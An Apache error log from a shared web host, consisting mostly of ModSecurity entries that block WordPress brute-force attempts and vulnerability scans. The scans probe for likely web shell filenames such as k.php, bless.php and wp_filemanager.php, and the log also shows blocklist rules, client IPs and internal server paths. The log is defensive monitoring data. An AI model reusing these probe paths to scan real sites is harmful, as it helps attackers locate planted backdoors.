[Tue May 26 14:23:20.564351 2026] [security2:error] [pid 606909:tid 607153] [client 202.141.83.254:19723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfgF0yRtX9qA7aVUVeUQAAAPc"]
[Tue May 26 14:23:20.564494 2026] [security2:error] [pid 606909:tid 607153] [client 202.141.83.254:19723] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfgF0yRtX9qA7aVUVeUQAAAPc"]
[Tue May 26 14:23:20.818076 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/k.php"] [unique_id "ahVfgF0yRtX9qA7aVUVeVgAAAKo"]
[Tue May 26 14:23:20.818210 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/k.php"] [unique_id "ahVfgF0yRtX9qA7aVUVeVgAAAKo"]
[Tue May 26 14:23:21.869005 2026] [security2:error] [pid 606909:tid 607040] [client 160.119.76.58:58154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahVfgV0yRtX9qA7aVUVeZgAAAIY"]
[Tue May 26 14:23:21.979864 2026] [security2:error] [pid 606909:tid 607087] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfgV0yRtX9qA7aVUVeYwAAALU"]
[Tue May 26 14:23:22.627549 2026] [security2:error] [pid 610693:tid 610942] [client 20.116.59.164:15233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/o.php"] [unique_id "ahVfgjvNO3hpmlY6M8RUbgAAAHc"]
[Tue May 26 14:23:22.627696 2026] [security2:error] [pid 610693:tid 610942] [client 20.116.59.164:15233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/o.php"] [unique_id "ahVfgjvNO3hpmlY6M8RUbgAAAHc"]
[Tue May 26 14:23:23.575720 2026] [security2:error] [pid 610693:tid 610829] [client 20.116.59.164:15320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/bb.php"] [unique_id "ahVfgzvNO3hpmlY6M8RUgQAAAAY"]
[Tue May 26 14:23:23.575817 2026] [security2:error] [pid 610693:tid 610829] [client 20.116.59.164:15320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/bb.php"] [unique_id "ahVfgzvNO3hpmlY6M8RUgQAAAAY"]
[Tue May 26 14:23:23.661025 2026] [security2:error] [pid 606909:tid 607139] [client 160.119.76.58:32998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahVfg10yRtX9qA7aVUVehgAAAOk"]
[Tue May 26 14:23:24.159778 2026] [security2:error] [pid 606909:tid 607161] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfg10yRtX9qA7aVUVeiAAAAP8"]
[Tue May 26 14:23:24.528211 2026] [security2:error] [pid 610693:tid 610874] [client 160.119.76.58:33014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVfhDvNO3hpmlY6M8RUjwAAADM"]
[Tue May 26 14:23:25.373901 2026] [security2:error] [pid 606909:tid 607052] [client 20.116.59.164:15337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/rip.php"] [unique_id "ahVfhV0yRtX9qA7aVUVeqAAAAJI"]
[Tue May 26 14:23:25.374020 2026] [security2:error] [pid 606909:tid 607052] [client 20.116.59.164:15337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/rip.php"] [unique_id "ahVfhV0yRtX9qA7aVUVeqAAAAJI"]
[Tue May 26 14:23:25.649682 2026] [security2:error] [pid 610693:tid 610888] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfhTvNO3hpmlY6M8RUmAAAAEE"]
[Tue May 26 14:23:25.893922 2026] [security2:error] [pid 610693:tid 610855] [client 195.2.79.165:61210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.79.2.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVfhTvNO3hpmlY6M8RUogAAACA"], referer: https://afstpaul.org/
[Tue May 26 14:23:27.337908 2026] [security2:error] [pid 606909:tid 607098] [client 40.77.167.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVfhl0yRtX9qA7aVUVevAAAAMA"]
[Tue May 26 14:23:27.608029 2026] [autoindex:error] [pid 610693:tid 610835] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:23:28.076611 2026] [security2:error] [pid 610693:tid 610846] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfhzvNO3hpmlY6M8RUzQAAABc"]
[Tue May 26 14:23:28.283640 2026] [security2:error] [pid 610693:tid 610938] [client 20.116.59.164:15232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/s.php"] [unique_id "ahVfiDvNO3hpmlY6M8RU2QAAAHM"]
[Tue May 26 14:23:28.283767 2026] [security2:error] [pid 610693:tid 610938] [client 20.116.59.164:15232] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/s.php"] [unique_id "ahVfiDvNO3hpmlY6M8RU2QAAAHM"]
[Tue May 26 14:23:28.588052 2026] [security2:error] [pid 610693:tid 610729] [remote 103.95.119.103:47750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVfiDvNO3hpmlY6M8RU2gAARCM"]
[Tue May 26 14:23:28.744504 2026] [security2:error] [pid 606909:tid 607110] [client 4.201.75.230:5478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVfiF0yRtX9qA7aVUVeyQAAAMw"]
[Tue May 26 14:23:28.968680 2026] [fcgid:warn] [pid 606909:tid 607041] (70014)End of file found: [client 8.219.79.215:43596] mod_fcgid: can't get data from http client
[Tue May 26 14:23:28.975879 2026] [fcgid:warn] [pid 606909:tid 607054] (70014)End of file found: [client 8.219.79.215:56348] mod_fcgid: can't get data from http client
[Tue May 26 14:23:29.933928 2026] [security2:error] [pid 606909:tid 607104] [client 4.201.75.230:5467] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/bless.php"] [unique_id "ahVfiV0yRtX9qA7aVUVe2AAAAMY"]
[Tue May 26 14:23:30.047383 2026] [autoindex:error] [pid 606909:tid 607047] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:23:30.196998 2026] [security2:error] [pid 610693:tid 610936] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfiTvNO3hpmlY6M8RU5AAAAHE"]
[Tue May 26 14:23:30.712352 2026] [security2:error] [pid 606909:tid 607022] [remote 37.187.156.42:42448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVfil0yRtX9qA7aVUVe9wAA03A"]
[Tue May 26 14:23:30.982254 2026] [security2:error] [pid 606909:tid 607115] [client 202.141.83.254:53879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfil0yRtX9qA7aVUVe_wAAANE"]
[Tue May 26 14:23:30.982390 2026] [security2:error] [pid 606909:tid 607115] [client 202.141.83.254:53879] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfil0yRtX9qA7aVUVe_wAAANE"]
[Tue May 26 14:23:31.692601 2026] [security2:error] [pid 606909:tid 607028] [remote 74.7.241.58:34236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVfi10yRtX9qA7aVUVfDQAA8nY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:23:32.063787 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-content/admin.php"] [unique_id "ahVfjF0yRtX9qA7aVUVfEwAAAKo"]
[Tue May 26 14:23:32.063879 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-content/admin.php"] [unique_id "ahVfjF0yRtX9qA7aVUVfEwAAAKo"]
[Tue May 26 14:23:32.689921 2026] [security2:error] [pid 610693:tid 610894] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfjDvNO3hpmlY6M8RVCwAAAEc"]
[Tue May 26 14:23:34.217354 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfjV0yRtX9qA7aVUVfMwAAAPs"]
[Tue May 26 14:23:34.539114 2026] [security2:error] [pid 610693:tid 610874] [client 20.116.59.164:15296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/gelay.php"] [unique_id "ahVfjjvNO3hpmlY6M8RVMAAAADM"]
[Tue May 26 14:23:34.539238 2026] [security2:error] [pid 610693:tid 610874] [client 20.116.59.164:15296] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/gelay.php"] [unique_id "ahVfjjvNO3hpmlY6M8RVMAAAADM"]
[Tue May 26 14:23:35.147745 2026] [security2:error] [pid 610693:tid 610838] [client 180.74.70.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfjjvNO3hpmlY6M8RVOAAAAA8"]
[Tue May 26 14:23:35.751243 2026] [security2:error] [pid 610693:tid 610946] [client 20.116.59.164:15251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVfjzvNO3hpmlY6M8RVUAAAAHs"]
[Tue May 26 14:23:35.751385 2026] [security2:error] [pid 610693:tid 610946] [client 20.116.59.164:15251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVfjzvNO3hpmlY6M8RVUAAAAHs"]
[Tue May 26 14:23:36.028981 2026] [security2:error] [pid 606909:tid 607072] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfj10yRtX9qA7aVUVfTwAAAKY"]
[Tue May 26 14:23:36.951685 2026] [security2:error] [pid 610693:tid 610925] [client 114.119.129.92:31493] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVfkDvNO3hpmlY6M8RVawAAAGY"], referer: http://haddingtonwines.com/cart?remove_item=fd45ebc1e1d76bc1fe0ba933e60e9957
[Tue May 26 14:23:37.970838 2026] [security2:error] [pid 610693:tid 610833] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfkTvNO3hpmlY6M8RVfgAAAAo"]
[Tue May 26 14:23:39.427705 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/adminfuns.php"] [unique_id "ahVfk10yRtX9qA7aVUVfgwAAAKo"]
[Tue May 26 14:23:39.427829 2026] [security2:error] [pid 606909:tid 607076] [client 20.116.59.164:15349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/adminfuns.php"] [unique_id "ahVfk10yRtX9qA7aVUVfgwAAAKo"]
[Tue May 26 14:23:40.448023 2026] [security2:error] [pid 610693:tid 610745] [remote 209.42.18.223:41068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVflDvNO3hpmlY6M8RVpQAAFDM"]
[Tue May 26 14:23:41.104888 2026] [security2:error] [pid 606909:tid 607102] [client 4.201.75.230:5472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVflV0yRtX9qA7aVUVfjgAAAMQ"]
[Tue May 26 14:23:41.697830 2026] [proxy:error] [pid 610693:tid 610928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:41.697903 2026] [proxy_http:error] [pid 610693:tid 610928] [client 20.116.59.164:15352] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:41.698561 2026] [proxy:error] [pid 610693:tid 610928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:41.698616 2026] [proxy_http:error] [pid 610693:tid 610928] [client 20.116.59.164:15352] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:41.698706 2026] [security2:error] [pid 610693:tid 610928] [client 20.116.59.164:15352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVflTvNO3hpmlY6M8RVuwAAAGk"]
[Tue May 26 14:23:41.858561 2026] [security2:error] [pid 610693:tid 610926] [client 202.141.83.254:19876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVflTvNO3hpmlY6M8RVvQAAAGc"]
[Tue May 26 14:23:41.862283 2026] [security2:error] [pid 610693:tid 610926] [client 202.141.83.254:19876] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVflTvNO3hpmlY6M8RVvQAAAGc"]
[Tue May 26 14:23:42.411881 2026] [security2:error] [pid 610693:tid 610927] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVflTvNO3hpmlY6M8RVwgAAAGg"]
[Tue May 26 14:23:42.721527 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfljvNO3hpmlY6M8RVxwAAABE"]
[Tue May 26 14:23:42.853832 2026] [security2:error] [pid 610693:tid 610937] [client 114.119.142.97:31033] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.chettinadavenue.com"] [uri "/"] [unique_id "ahVfljvNO3hpmlY6M8RV1QAAAHI"], referer: https://www.glotels.com/IN/Ooty/103619688943946/Chettinad-Avenue
[Tue May 26 14:23:44.729349 2026] [security2:error] [pid 606909:tid 607053] [client 20.116.59.164:15258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahVfmF0yRtX9qA7aVUVftAAAAJM"]
[Tue May 26 14:23:44.729458 2026] [security2:error] [pid 606909:tid 607053] [client 20.116.59.164:15258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahVfmF0yRtX9qA7aVUVftAAAAJM"]
[Tue May 26 14:23:44.781482 2026] [security2:error] [pid 610693:tid 610877] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfmDvNO3hpmlY6M8RV6wAAADY"]
[Tue May 26 14:23:45.792673 2026] [security2:error] [pid 610693:tid 610899] [client 20.116.59.164:11250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfmTvNO3hpmlY6M8RWAQAAAEw"]
[Tue May 26 14:23:45.792819 2026] [security2:error] [pid 610693:tid 610899] [client 20.116.59.164:11250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfmTvNO3hpmlY6M8RWAQAAAEw"]
[Tue May 26 14:23:46.254903 2026] [security2:error] [pid 606909:tid 607104] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfmV0yRtX9qA7aVUVfxQAAAMY"]
